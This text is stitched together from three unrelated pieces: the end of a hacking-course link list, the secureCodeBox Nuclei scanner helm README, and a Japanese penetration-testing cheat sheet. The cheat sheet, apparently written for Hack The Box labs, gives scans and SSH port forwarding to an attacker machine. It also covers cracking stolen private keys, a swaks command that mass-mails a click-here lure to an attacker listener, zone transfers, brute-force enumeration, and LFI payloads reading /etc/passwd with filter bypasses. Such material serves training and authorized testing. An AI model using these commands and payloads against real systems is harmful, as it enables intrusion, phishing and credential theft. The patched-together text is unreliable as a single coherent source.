- <a href="https://hakin9.org/product/w47-voip-pentesting/">VoIP Pentesting (W47)</a>
- <a href="https://academy.ehacking.net/p/voip-hacking-penetration-testing-training">VoIP Hacking & Penetration Testing Training</a>
- <a href="https://www.voip.school/p/voip-hacking">VoIP pentest and SIP hacking</a>
- Labs
- Setup your lab from the courses & books
<br>
<br>
# RFID & SDR
- Books
- <a href="https://www.amazon.com/RFID-Security-Frank-Thornton-ebook/dp/B002C4KMKA">RFID Security</a>
- <a href="https://www.amazon.com/Inside-Radio-Attack-Defense-Guide/dp/9811084467">Inside Radio: An Attack and Defense Guide</a>
- Courses
- <a href="https://www.udemy.com/course/the-vulnerability-of-rfid-tag/">Ethical RFID Hacking</a>
- <a href="https://training.hackersera.com/p/?page=online-training#collapsesdr1">SDR Exploitation</a>
- <a href="https://www.udemy.com/course/software-defined-radio/">SDR for Ethical Hackers and Security Researchers </a>
- <a href="https://www.udemy.com/course/advance-sdr-for-ethical-hackers-security-researchers/">Advance SDR for Ethical Hackers Security Researchers 2.0</a>
- <a href="https://www.udemy.com/course/software-defined-radio-3/">SDR for Ethical Hackers and Security Researchers 3.0</a>
- Labs
- Setup your lab from the courses & books
<br>
<br>
# Created By
<a href="https://www.linkedin.com/in/zer0verflow/">Zeyad Azima</a> & <a href="https://www.linkedin.com/in/yosef0x1/">Youssef Mohamed</a>
# Thank u all and have a good hacking time to make internet more secure. :) Happy Hacking
|
---
title: "Nuclei"
category: "scanner"
type: "Website"
state: "released"
appVersion: "v2.7.0"
usecase: "Nuclei is a fast, template based vulnerability scanner."
---
<!--
SPDX-FileCopyrightText: the secureCodeBox authors
SPDX-License-Identifier: Apache-2.0
-->
<!--
.: IMPORTANT! :.
--------------------------
This file is generated automatically with `helm-docs` based on the following template files:
- ./.helm-docs/templates.gotmpl (general template data for all charts)
- ./chart-folder/.helm-docs.gotmpl (chart specific template data)
Please be aware of that and apply your changes only within those template files instead of this file.
Otherwise your changes will be reverted/overwritten automatically due to the build process `./.github/workflows/helm-docs.yaml`
--------------------------
-->
<p align="center">
<a href="https://opensource.org/licenses/Apache-2.0"><img alt="License Apache-2.0" src="https://img.shields.io/badge/License-Apache%202.0-blue.svg"/></a>
<a href="https://github.com/secureCodeBox/secureCodeBox/releases/latest"><img alt="GitHub release (latest SemVer)" src="https://img.shields.io/github/v/release/secureCodeBox/secureCodeBox?sort=semver"/></a>
<a href="https://owasp.org/www-project-securecodebox/"><img alt="OWASP Lab Project" src="https://img.shields.io/badge/OWASP-Lab%20Project-yellow"/></a>
<a href="https://artifacthub.io/packages/search?repo=securecodebox"><img alt="Artifact HUB" src="https://img.shields.io/endpoint?url=https://artifacthub.io/badge/repository/securecodebox"/></a>
<a href="https://github.com/secureCodeBox/secureCodeBox/"><img alt="GitHub Repo stars" src="https://img.shields.io/github/stars/secureCodeBox/secureCodeBox?logo=GitHub"/></a>
<a href="https://twitter.com/securecodebox"><img alt="Twitter Follower" src="https://img.shields.io/twitter/follow/securecodebox?style=flat&color=blue&logo=twitter"/></a>
</p>
## What is Nuclei
Nuclei is used to send requests across targets based on a template leading to zero false positives and providing fast scanning on large number of hosts. Nuclei offers scanning for a variety of protocols including TCP, DNS, HTTP, File, etc. With powerful and flexible templating, all kinds of security checks can be modelled with Nuclei.
To learn more about the Nuclei scanner itself visit [Nuclei GitHub] or [Nuclei Website].
## Deployment
The nuclei chart can be deployed via helm:
```bash
# Install HelmChart (use -n to configure another namespace)
helm upgrade --install nuclei secureCodeBox/nuclei
```
## Scanner Configuration
The following security scan configuration example are based on the [Nuclei Documentation], please take a look at the original documentation for more configuration examples.
```bash
nuclei -h
Nuclei is a fast, template based vulnerability scanner focusing
on extensive configurability, massive extensibility and ease of use.
Usage:
nuclei [flags]
Flags:
TARGET:
-u, -target string[] target URLs/hosts to scan
-l, -list string path to file containing a list of target URLs/hosts to scan (one per line)
TEMPLATES:
-tl list all available templates
-t, -templates string[] template or template directory paths to include in the scan
-w, -workflows string[] list of workflows to run
-nt, -new-templates run newly added templates only
-validate validate the passed templates to nuclei
FILTERING:
-tags string[] execute a subset of templates that contain the provided tags
-include-tags string[] tags from the default deny list that permit executing more intrusive templates
-etags, -exclude-tags string[] exclude templates with the provided tags
-include-templates string[] templates to be executed even if they are excluded either by default or configuration
-exclude-templates, -exclude string[] template or template directory paths to exclude
-severity, -impact string[] execute templates that match the provided severities only
-author string[] execute templates that are (co-)created by the specified authors
OUTPUT:
-o, -output string output file to write found issues/vulnerabilities
-silent display findings only
-v, -verbose show verbose output
-vv display extra verbose information
-nc, -no-color disable output content coloring (ANSI escape codes)
-json write output in JSONL(ines) format
-irr, -include-rr include request/response pairs in the JSONL output (for findings only)
-nm, -no-meta don't display match metadata
-rdb, -report-db string local nuclei reporting database (always use this to persist report data)
-me, -markdown-export string directory to export results in markdown format
-se, -sarif-export string file to export results in SARIF format
CONFIGURATIONS:
-config string path to the nuclei configuration file
-rc, -report-config string nuclei reporting module configuration file
-H, -header string[] custom headers in header:value format
-V, -var value custom vars in var=value format
-r, -resolvers string file containing resolver list for nuclei
-system-resolvers use system DNS resolving as error fallback
-passive enable passive HTTP response processing mode
-env-vars Enable environment variables support
INTERACTSH:
-no-interactsh do not use interactsh server for blind interaction polling
-interactsh-url string self-hosted Interactsh Server URL (default "https://interact.sh")
-interactions-cache-size int number of requests to keep in the interactions cache (default 5000)
-interactions-eviction int number of seconds to wait before evicting requests from cache (default 60)
-interactions-poll-duration int number of seconds to wait before each interaction poll request (default 5)
-interactions-cooldown-period int extra time for interaction polling before exiting (default 5)
RATE-LIMIT:
-rl, -rate-limit int maximum number of requests to send per second (default 150)
-rlm, -rate-limit-minute int maximum number of requests to send per minute
-bs, -bulk-size int maximum number of hosts to be analyzed in parallel per template (default 25)
-c, -concurrency int maximum number of templates to be executed in parallel (default 10)
OPTIMIZATIONS:
-timeout int time to wait in seconds before timeout (default 5)
-retries int number of times to retry a failed request (default 1)
-project use a project folder to avoid sending same request multiple times
-project-path string set a specific project path (default "/var/folders/xq/zxykn5wd0tx796f0xhxf94th0000gp/T/")
-spm, -stop-at-first-path stop processing HTTP requests after the first match (may break template/workflow logic)
HEADLESS:
-headless enable templates that require headless browser support
-page-timeout int seconds to wait for each page in headless mode (default 20)
-show-browser show the browser on the screen when running templates with headless mode
DEBUG:
-debug show all requests and responses
-debug-req show all sent requests
-debug-resp show all received responses
-proxy, -proxy-url string URL of the HTTP proxy server
-proxy-socks-url string URL of the SOCKS proxy server
-trace-log string file to write sent requests trace log
-version show nuclei version
-tv, -templates-version shows the version of the installed nuclei-templates
UPDATE:
-update update nuclei to the latest released version
-ut, -update-templates update the community templates to latest released version
-nut, -no-update-templates Do not check for nuclei-templates updates
-ud, -update-directory string overwrite the default nuclei-templates directory (default "/Users/robert/nuclei-templates")
STATISTICS:
-stats display statistics about the running scan
-stats-json write statistics data to an output file in JSONL(ines) format
-si, -stats-interval int number of seconds to wait between showing a statistics update (default 5)
-metrics expose nuclei metrics on a port
-metrics-port int port to expose nuclei metrics on (default 9092)
```
## Requirements
Kubernetes: `>=v1.11.0-0`
## Install Nuclei without Template Cache CronJob / PersistentVolume
Nuclei uses dynamic templates as its scan rules, these determine which requests are performed and which responses are considered to be a finding.
These templates are usually dynamically downloaded by nuclei from GitHub before each scan. When you are running dozens of parallel nuclei scans you quickly run into situations where GitHub will rate limit you causing the scans to fail.
To avoid these errors we included a CronJob which periodically fetches the current templates and writes them into a kubernetes PersistentVolume (PV). This volume is then mounted (as a `ReadOnlyMany` mount) into every scan so that nuclei scans have the up-to-date templates without having to download them on every scan.
Unfortunately not every cluster supports the required `ReadOnlyMany` volume type.
In these cases you can disable the template cache mechanism by setting `nucleiTemplateCache.enabled=false`.
Note thought, that this will limit the number of scans you can run in parallel as the rate limit will likely cause some of the scans to fail.
```bash
helm install nuclei secureCodeBox/nuclei --set="nucleiTemplateCache.enabled=false"
```
## Values
| Key | Type | Default | Description |
|-----|------|---------|-------------|
| cascadingRules.enabled | bool | `true` | Enables or disables the installation of the default cascading rules for this scanner |
| nucleiTemplateCache.concurrencyPolicy | string | `"Replace"` | Determines how kubernetes handles cases where multiple instances of the cronjob would work if they are running at the same time. See: https://kubernetes.io/docs/tasks/job/automated-tasks-with-cron-jobs/#concurrency-policy |
| nucleiTemplateCache.enabled | bool | `true` | Enables or disables the use of an persistent volume to cache the always downloaded nuclei-templates for all scans. |
| nucleiTemplateCache.failedJobsHistoryLimit | int | `10` | Determines how many failed jobs are kept until kubernetes cleans them up. See: https://kubernetes.io/docs/tasks/job/automated-tasks-with-cron-jobs/#jobs-history-limits |
| nucleiTemplateCache.schedule | string | `"0 */1 * * *"` | The schedule indicates when and how often the nuclei template cache should be updated |
| nucleiTemplateCache.successfulJobsHistoryLimit | int | `3` | Determines how many successful jobs are kept until kubernetes cleans them up. See: https://kubernetes.io/docs/tasks/job/automated-tasks-with-cron-jobs/#jobs-history-limits |
| parser.affinity | object | `{}` | Optional affinity settings that control how the parser job is scheduled (see: https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes-using-node-affinity/) |
| parser.env | list | `[]` | Optional environment variables mapped into each parseJob (see: https://kubernetes.io/docs/tasks/inject-data-application/define-environment-variable-container/) |
| parser.image.pullPolicy | string | `"IfNotPresent"` | Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images |
| parser.image.repository | string | `"docker.io/securecodebox/parser-nuclei"` | Parser image repository |
| parser.image.tag | string | defaults to the charts version | Parser image tag |
| parser.scopeLimiterAliases | object | `{}` | Optional finding aliases to be used in the scopeLimiter. |
| parser.tolerations | list | `[]` | Optional tolerations settings that control how the parser job is scheduled (see: https://kubernetes.io/docs/concepts/scheduling-eviction/taint-and-toleration/) |
| parser.ttlSecondsAfterFinished | string | `nil` | seconds after which the kubernetes job for the parser will be deleted. Requires the Kubernetes TTLAfterFinished controller: https://kubernetes.io/docs/concepts/workloads/controllers/ttlafterfinished/ |
| scanner.activeDeadlineSeconds | string | `nil` | There are situations where you want to fail a scan Job after some amount of time. To do so, set activeDeadlineSeconds to define an active deadline (in seconds) when considering a scan Job as failed. (see: https://kubernetes.io/docs/concepts/workloads/controllers/job/#job-termination-and-cleanup) |
| scanner.affinity | object | `{}` | Optional affinity settings that control how the scanner job is scheduled (see: https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes-using-node-affinity/) |
| scanner.backoffLimit | int | 3 | There are situations where you want to fail a scan Job after some amount of retries due to a logical error in configuration etc. To do so, set backoffLimit to specify the number of retries before considering a scan Job as failed. (see: https://kubernetes.io/docs/concepts/workloads/controllers/job/#pod-backoff-failure-policy) |
| scanner.env | list | `[]` | Optional environment variables mapped into each scanJob (see: https://kubernetes.io/docs/tasks/inject-data-application/define-environment-variable-container/) |
| scanner.extraContainers | list | `[]` | Optional additional Containers started with each scanJob (see: https://kubernetes.io/docs/concepts/workloads/pods/init-containers/) |
| scanner.extraVolumeMounts | list | `[]` | Optional VolumeMounts mapped into each scanJob (see: https://kubernetes.io/docs/concepts/storage/volumes/) |
| scanner.extraVolumes | list | `[]` | Optional Volumes mapped into each scanJob (see: https://kubernetes.io/docs/concepts/storage/volumes/) |
| scanner.image.pullPolicy | string | `"IfNotPresent"` | Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images |
| scanner.image.repository | string | `"docker.io/projectdiscovery/nuclei"` | Container Image to run the scan |
| scanner.image.tag | string | `nil` | defaults to the charts appVersion |
| scanner.nameAppend | string | `nil` | append a string to the default scantype name. |
| scanner.resources | object | `{}` | CPU/memory resource requests/limits (see: https://kubernetes.io/docs/tasks/configure-pod-container/assign-memory-resource/, https://kubernetes.io/docs/tasks/configure-pod-container/assign-cpu-resource/) |
| scanner.securityContext | object | `{"allowPrivilegeEscalation":false,"capabilities":{"drop":["all"]},"privileged":false,"readOnlyRootFilesystem":false,"runAsNonRoot":false}` | Optional securityContext set on scanner container (see: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/) |
| scanner.securityContext.allowPrivilegeEscalation | bool | `false` | Ensure that users privileges cannot be escalated |
| scanner.securityContext.capabilities.drop[0] | string | `"all"` | This drops all linux privileges from the container. |
| scanner.securityContext.privileged | bool | `false` | Ensures that the scanner container is not run in privileged mode |
| scanner.securityContext.readOnlyRootFilesystem | bool | `false` | Prevents write access to the containers file system |
| scanner.securityContext.runAsNonRoot | bool | `false` | Enforces that the scanner image is run as a non root user |
| scanner.tolerations | list | `[]` | Optional tolerations settings that control how the scanner job is scheduled (see: https://kubernetes.io/docs/concepts/scheduling-eviction/taint-and-toleration/) |
| scanner.ttlSecondsAfterFinished | string | `nil` | seconds after which the kubernetes job for the scanner will be deleted. Requires the Kubernetes TTLAfterFinished controller: https://kubernetes.io/docs/concepts/workloads/controllers/ttlafterfinished/ |
## License
[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
Code of secureCodeBox is licensed under the [Apache License 2.0][scb-license].
[scb-owasp]: https://www.owasp.org/index.php/OWASP_secureCodeBox
[scb-docs]: https://docs.securecodebox.io/
[scb-site]: https://www.securecodebox.io/
[scb-github]: https://github.com/secureCodeBox/
[scb-twitter]: https://twitter.com/secureCodeBox
[scb-slack]: https://join.slack.com/t/securecodebox/shared_invite/enQtNDU3MTUyOTM0NTMwLTBjOWRjNjVkNGEyMjQ0ZGMyNDdlYTQxYWQ4MzNiNGY3MDMxNThkZjJmMzY2NDRhMTk3ZWM3OWFkYmY1YzUxNTU
[scb-license]: https://github.com/secureCodeBox/secureCodeBox/blob/master/LICENSE
[Nuclei Website]: https://nuclei.projectdiscovery.io/
[Nuclei GitHub]: https://github.com/projectdiscovery/nuclei
[Nuclei Documentation]: https://nuclei.projectdiscovery.io/nuclei/get-started/
|
# ペネトレーションテスト用チートシート
# Enum
## Nmap
```
kali@kali:$ sudo nmap -sC -sV -oN nmap/initial 10.10.10.1
```
```
kali@kali:$ sudo nmap -sC -sV -p- -oN nmap/full 10.10.10.1
```
```
kali@kali:$ sudo nmap --min-rate=10000 -p- -v 10.10.10.1
(上記の結果を元に)kali@kali:$ sudo nmap -sC -sV -oN nmap/fast -v -p 22,80,3000 10.10.10.1
```
```
ports=$(nmap -p- --min-rate=10000 -T4 10.10.10.1 | grep ^[0-9] | cut -d '/' -f 1 | tr
'\n' ',' | sed s/,$//)
nmap -p$ports -sV -sC 10.10.10.242
```
```
kali@kali:$ sudo nmap --script vuln -oN nmap/vuln 10.10.10.1
```
```
kali@kali:$ nmap --script http-enum 10.10.10.1 -p 80
PORT STATE SERVICE
80/tcp open http
| http-enum:
| /admin/: Possible admin folder
| /admin/index.html: Possible admin folder
| /wp-login.php: Possible admin folder
| /robots.txt: Robots file
| /feed/: Wordpress version: 4.3.1
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
|_ /readme.html: Interesting, a readme.
```
| オプション | 説明 |
| ---- | ---- |
| -sS | ステルス/SYNスキャン |
| -sT | TCPスキャン |
| -sU | UDPスキャン |
| -sn | ネットワークスイープ |
| -sC | --script=defaultの意味 |
| -sV | 特定のポートで動作しているサービスを識別 |
| -O | OSフィンガープリンティング(ターゲットのOS判別) |
| -A | アグレッシブモード(サービス/OS検出・traceroute) |
| -T0~5 | スキャンタイミングの指定<br>数字が大きくなるほどスキャン速度が速くなる<br>-T0や-T1を用いることでIPSなどの防御システムを回避できる可能性がある |
| -v,-vv | 詳細の出力 |
| -oG | grep可能なファイル形式に出力 |
| --top-ports | 優先度の高い順にポートを検出(/usr/share/nmap/nmap-servicesに依存) |
| --script= | 様々なスクリプトの使用 |
| | dns-zone-transfer |
| | smb-os-discovery |
| | http-enum |
| | vuln |
| -sN | NULLスキャン<br>フラグが設定されていない状態(空のパケット)でTCP要求を送信<br>ポートが閉じている場合、ターゲットホストはRSTで応答 |
| -sF | FINスキャン<br>-sNと基本的に同じだがからのパケットを送信する代わりにFINフラグを使用して送信<br>ポートが閉じている場合、ターゲットホストはRSTで応答 |
| -sX | Xmasスキャン<br>不正な形式のTCPパケットを送信<br>ポートが閉じている場合、ターゲットホストはRSTで応答 |
## Masscan
Massscanはインターネット全体を約6分でスキャンし、1秒間に1000万パケットという驚異的な数のパケットを送信する最速のポートスキャナー。
raw socketsの権限を必要とするためsudoを用いる。
下記のコマンドではTCPポート80が空いているホストをclass Aサブネットで列挙している。
```
kali@kali:~$ sudo masscan -p80 10.0.0.0/8
```
## FTP(21)
```
ログインユーザの指定...user (ユーザ名) (パスワード)
ファイル転送モードを指定...type (転送モード)
```
| コマンド | 説明 |
| ---- | ---- |
| USER (username)<br>PASS (password) | ログイン情報の記述。 |
| ls -la | 隠しファイルも表示。。 |
| get (リモートファイル名) (ローカルファイル名) | サーバのファイルをパソコンに転送。 |
| mget (リモートファイル名 [...]) | サーバの複数のファイルをパソコンに転送。 |
| mput (ローカルファイル名 [...]) | パソコンの複数のファイルをサーバに転送。 |
| put (ローカルファイル名) (リモートファイル名) | パソコンのファイルをサーバに転送。 |
| type (転送モード) | 現在のファイル転送モードを表示。 |
下記のように止まってしまった場合、
```
ftp> ls
229 Entering Extended Passive Mode (|||56201|)
...
```
passiveコマンドを入力することで解消される。
```
ftp> passive
Passive moden: off; fallback to active mode: off.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xr-x 2 1001 0 4096 May 26 2020 contactform
drwxr-xr-x 2 1001 0 4096 May 26 2020 css
drwxr-xr-x 3 1001 0 4096 May 26 2020 img
-rw-r--r-- 1 1001 0 23364 May 27 2020 index.php
drwxr-xr-x 2 1001 0 4096 May 26 2020 js
drwxr-xr-x 11 1001 0 4096 May 26 2020 lib
226 Directory send OK.
```
また、ファイルをダウンロードする際には、バイナリモードにしておくとトラブルを避けられる可能性がある。
```
ftp> binary
```
## SSH(22)
### scp
sshを利用したファイルの受け渡し。
```
ダウンロード
# Linux
scp [email protected]:/home/charix/secret.zip .
# Windows
scp [email protected]:C:/ftp/Infrastructure.pdf .
```
```
アップロード
# Linux
scp linpeas.sh [email protected]:/home/charix/secret.zip
# Windows
scp winpeas.exe [email protected]:C:/Users/ariah/Desktop
```
### SSHポートフォワーディング
#### ローカルポートフォワーディング
対象マシンの特定のポートで作動しているサービスをlocalhostでアクセスできるようにする。
相手のsshサーバから自分のローカルホストへ引き寄せる。
コマンドは自分のホストで発行。
```
kali@kali:$ ssh -L 8000:127.0.0.1:8000 [email protected]
```
- -L...[相手の動作しているポート番号(対象マシン):ローカルホストアドレス(自分のマシン):ローカルで展開するポート番号(自分のマシン)]
#### リモートポートフォワーディング
対象マシンの特定のポートで作動しているサービスをlocalhostでアクセスできるようにする。
自分のsshサーバへ飛ばす。
コマンドは相手のホストで発行。
```
kali@kali:~$ sudo systemctl start ssh
```
```
ssh -R 8888:127.0.0.1:8888 [email protected]
plink.exe -ssh -R 8888:127.0.0.1:8888 -l kali -pw kali 10.10.14.11
```
- -ssh...sshを介して
- -R...[相手の動作しているポート番号(自分のマシン):ローカルホストアドレス(対象マシン):サービスが展開されているポート(対象マシン)]
- -l...攻撃者のユーザ名
- -pw...攻撃者のパスワード
### ssh-keygen
```
ssh-keygen -t rsa -f id_rsa
chmod 600 id_rsa
```
- -t...暗号の種類(ed25519,rsaなど)
- -b...ビット数の固定(-t rsa -b 4096など)
- -f...ファイル名(id_????の?部分)
victimからid_rsaを取得してコピーした際には、最後に改行を入れておく。
```
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
YG6tmwVeTbhkycXMbEVeIsG0a42Yj1ywrq5GyXKYaFr3DnDITcqLbdxIIEdH1vrRjYynVM
---snip---
ueX7aq9pIXhcGT6M9CGUJjyEkvOrx+HRD4TKu0lGcO3LVANGPqSfks4r5Ea4LiZ4Q4YnOJ
u8KqOiDVrwmFJRAAAACWx1aXNAc2VhbAE=
-----END OPENSSH PRIVATE KEY-----ここに改行
```
### 公開鍵認証方式でsshログイン
```
cat id_rsa.pub >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
```
```
ssh -i id_rsa [email protected]
```
### id_rsaのクラック
```
ssh2john id_rsa > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --show hash.txt
```
```
┌──(kali㉿kali)-[~/htb/boxes/Valentine]
└─$ openssl rsa -in id_rsa -out decrypt_id_rsa 1 ⨯
Enter pass phrase for test:<input key>
writing RSA key
```
## SMTP(25)
```
telnet 10.10.10.1 25
```
メールの送信:
```
MAIL FROM: <送信元のメールアドレス>
RCPT TO: <送信先のメールアドレス>
DATA
<送信内容の記述>
QUIT
```
```
nmap -p 25 --script smtp-commands 10.10.10.10
```
| コマンド | 動作 |
| ---- | ---- |
| VERY | サーバに電子メールアドレスの確認を要求 |
| EXPN | サーバにメーリングリストの資格を要求 |
### Webサイトからメールアドレスの一覧などを取得
```
cewl -e -d 10 --email_file email.txt http://sneakycorp.htb
```
- -e...emailアドレスを取得
- -d...取得するディレクトリの深さを指定
- --email_file...emailアドレスをファイルに出力
### メール送信の自動化
```
nc -lvnp 1234
swaks --to $(cat email.txt | tr '\n' ',' | less) --from [email protected] --header "Subject: test" --body "please click here http://10.10.10.1:1234/" --server 10.10.10.197
```
## DNS(53)
- -NS(ネームサーバーレコード)...ドメインのDNSレコードをホストする権威サーバーの名前が含まれる
- -A(ホストレコード)...ホスト名のIPアドレスが含まれている
- -MX(mail Exchangeレコード)...ドメインの電子メール処理を担当するサーバーの名前が含まれている
- -PTR(ポインタレコード)...逆引きで使用されIPアドレスに関連するレコードを見つけるために使用される
- -TXT(テキストレコード)...テキストレコードは任意のデータを含むことができ、ドメインの所有権確認などを行える
hostコマンドはデフォルトではAレコードを検索するが、-tオプションをつけることで、その他のレコードを検索することも可能。
```
kali@kali:~$ host -t txt megacorpone.com
```
### ドメイン名の特定
DNSサーバー = 10.10.10.13
ドメイン名を調べたいIPアドレス = 10.10.10.13
10.10.10.13 = ns1.cronos.htb
```
┌──(kali㉿kali)-[~]
└─$ nslookup
> server 10.10.10.13 # DNSサーバーの指定
Default server: 10.10.10.13
Address: 10.10.10.13#53
> 10.10.10.13 # ドメイン名を知りたいIPアドレスの指定
13.10.10.10.in-addr.arpa name = ns1.cronos.htb.
```
### サブドメインの列挙
#### DNSゾーン転送
権威DNSサーバの設定不備によってゾーン情報を取得できることがある。
これによりサーバーの名前、アドレス、機能などを調べることができる。
```
dig axfr cronos.htb @10.10.10.13
```
```
host -l <domain name> <dns server address>
```
#### DNSRecon
DNS列挙スクリプト。
サブドメインの列挙。(ゾーン転送とブルートフォース)
```
1.kali@kali:~$ dnsrecon -d megacorpone.com -t axfr
2.kali@kali:~$ dnsrecon -d megacorpone.com -D ~/list.txt -t brt
```
- -d...ドメイン名の指定
- -t axfr...ゾーン転送
- -t brt...ブルートフォース
- -D...サブドメイン文字列を含むワードリストファイルの指定
#### DNSmap
サブドメインの列挙。(ブルートフォース)
```
┌──(root💀kali)-[/home/kali/htb/boxes/Cronos]
└─# dnsmap cronos.htb -w /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt 127 ⨯
dnsmap 0.35 - DNS Network Mapper
[+] searching (sub)domains for cronos.htb using /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt
[+] using maximum random delay of 10 millisecond(s) between requests
www.cronos.htb
IP address #1: 10.10.10.13
[+] warning: internal IP address disclosed
admin.cronos.htb
IP address #1: 10.10.10.13
[+] warning: internal IP address disclosed
```
#### DNSenum
DNSReconとは異なった出力をするDNS列挙ツール。
```
kali@kali:~$ dnsenum zonetransfer.me
```
#### OSINT
```
# 検索エンジンを利用した手動列挙
site:*.test.com,
```
Sublist3r(自動列挙ツール):
https://github.com/aboul3la/Sublist3r
```
./sublist3r.py -d test.com
```
## HTTP(80)
### チェック項目
- robots.txt,sitemap.xmlの確認
- サブドメインの列挙
- ディレクトリスキャナーの使用
- CMSの特定
- ログインの試行
- デフォルトパスワードの入力
- パスワード推測
- SQLインジェクションの試行
- Webサイト上にある情報からユーザー/パスワードリストの作成
- ブルートフォース
- BurpSuiteを用いてWebの挙動の確認
- URLを見て、LFIの脆弱性が無いか確認
- upload機構がある場合、バイパス方法の模索
- 掲載されている画像にヒントが無いか確認
### robots.txt,sitemap.xmlの確認
```
curl http://<IPアドレス>/robots.txt
curl http://<IPアドレス>/sitemap.xml
```
### /etc/hostsファイルの編集
```
sudo emacs /etc/hosts
10.10.10.1 admin.htb
```
### Subdomainの列挙
#### Gobuster(DNSモード)
DNSサブドメインのブルートフォース。
-dオプションで指定したドメインのサブドメインを見つけるために使用する。
```
gobuster dns -d test.com -w subdomains-top1mil-5000.txt -i
```
- -d...ドメイン名の指定
- -i...IPアドレスの表示
#### Gobuster(Vhostモード)
組織が複数のドメイン名を1代のサーバーでホストしている仮想ホストを見つけることが可能。
```
gobuster vhost -u http://test.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-11000.txt
```
### ^ffuf(subdomain)
```
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://shibboleth.htb/ -H "Host: FUZZ.shibboleth.htb"
# 単語の量でフィルタリング
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://shibboleth.htb/ -H "Host: FUZZ.shibboleth.htb" -fw 18
```
- -fw...単語の量でフィルタリング(一つ目のコマンドで表示された最も多いsizeの値を指定)
- -fl...行数でフィルタリング
- -fs...応答のサイズでフィルタリング
- -fc...ステータスコードでフィルタリング
- -fr...正規表現のパターンでフィルタリング
### ディレクトリスキャン
#### dirb
```
dirb http://website.com -r -z 10
```
- -r...非再帰的にスキャン
- -z...各リクエストに10ミリ秒の遅延を加える
#### ^Gobuster
```
gobuster dir -t 50 -u <url> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -f -x php,txt,py,html,png,jpg -o <output filename> -k -s 200,204,301,302,307,401,403,303
```
- dir...ディレクトリ総当たり
- -t...スレッド数
- -u...URL指定
- -w...wordlistの指定
- -o...ファイル出力
- -f...ディレクトリの末尾に「/」を追加
- -x...拡張子指定
- -k...SSLをスキップ
- -s...ステータスコードの指定
#### ^feroxbuster
apache2:
```
feroxbuster -u http://10.10.10.1/ -f -n -x php,html,txt -o feroxbuster/80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
```
IIS:
```
feroxbuster -u http://10.10.10.1/ -f -n -x html,aspx,asp,txt -o feroxbuster/80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
```
- -u...URL指定
- -n...再起的スキャンをしない(/server-statusが検出された時に不都合)
- -x...拡張子の指定
- -f...ディレクトリの末尾に「/」を追加
- -w...wordlistの指定
- -o...ファイル出力
- -t...スレッド数(デフォルトは50)
- -k...SSLをスキップ
#### ^ffuf
```
Directory Fuzzing:
ffuf -c -w /path/to/wordlist -u http://test.com/FUZZ -v
Output File:
ffuf -c -w /path/to/wordlist -u http://test.com/FUZZ -e .php,txt -v > output.txt
```
- -c...出力をカラーにする
- -w...wordlistの指定
- -u...ターゲットURLの指定
- -e...拡張子の指定(.php,.txt,.aspx)
- --recursion...再帰的スキャン
- -v...冗長な出力
- -o...結果をファイルに出力
### ^Nikto
```
nikto -h <url> -Format txt -o <output filename>
```
- -h...url指定
- -t...スキャンのチューニング
- -Format...出力するファイルの拡張子を指定
- -o...ファイルへ出力する
- -ssl...SSLを使用するサイトで使用
- -maxtime=30s...指定された時間後にスキャンを停止
### ^BurpSuite
ローカルプロキシツール。
通信の改ざんをするために使用。
他にもXSSやSQLインジェクションなどの脆弱性を発見するために使う。
LFIなどを利用する時にも使用。
![](./image/2021-05-06-17-25-26.png)
#### Intruder
診断したいパラメータ部分に、自動で挿入を行ってくれる。
これを利用することで、Repeterを用いた手動による検査ではなく、SQLインジェクションなどを自動化することが可能。
また、ログインページのブルートフォースなどにも使用可能。
#### Repeater
HTTPリクエストをBurpから直接送信することで、繰り返しHTTPリクエストを送信することが可能。
この機能を用いて、ログインフォームやOSコマンドインジェクションが疑われる箇所に対して、効率よく様々なスクリプトを挿入可能。
#### Do intercept(Response to this request)
HTTPレスポンスの改ざんが可能。
これを利用することで、ステータスコード「302 Found」などで目的のページにたどり着く前に移動させられる際に、「200 Found」に変更してやることで目的のページへたどり着くことが可能。
### apache2
実行権限の確認:
ルートディレクトリに書き込んだファイルはAssignUserID <ユーザ名> <グループ名>で記述された権限で実行される。
```
/etc/apache2/sites-enabled/<configファイル>
AssignUserID joanna joanna
```
### ^LFI(ローカルファイルインクルード)
file_get_contents関数の不備。
```
http://<url>/browse.php?files=../../../../../../../../etc/passwd
http://<url>/browse.php?files=../../../../../../../../etc/hosts
```
```
http://<url>/browse.php?files=php://filter/convert.base64-encode/resource=phpinfo.php
echo -n PD9waHAKcGhwaW5mbygpOwo/Pgo= | base64 -d
```
```
http://<url>/browse.php?files=expected://ls
```
Examples:
```
http://example.com/index.php?page=/etc/passwd
# /etc/passwdというキーワードがフィルタリングされている場合
http://example.com/index.php?page=/etc/passwd%00
http://example.com/index.php?page=../../etc/passwd
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=....//....//etc/passwd
```
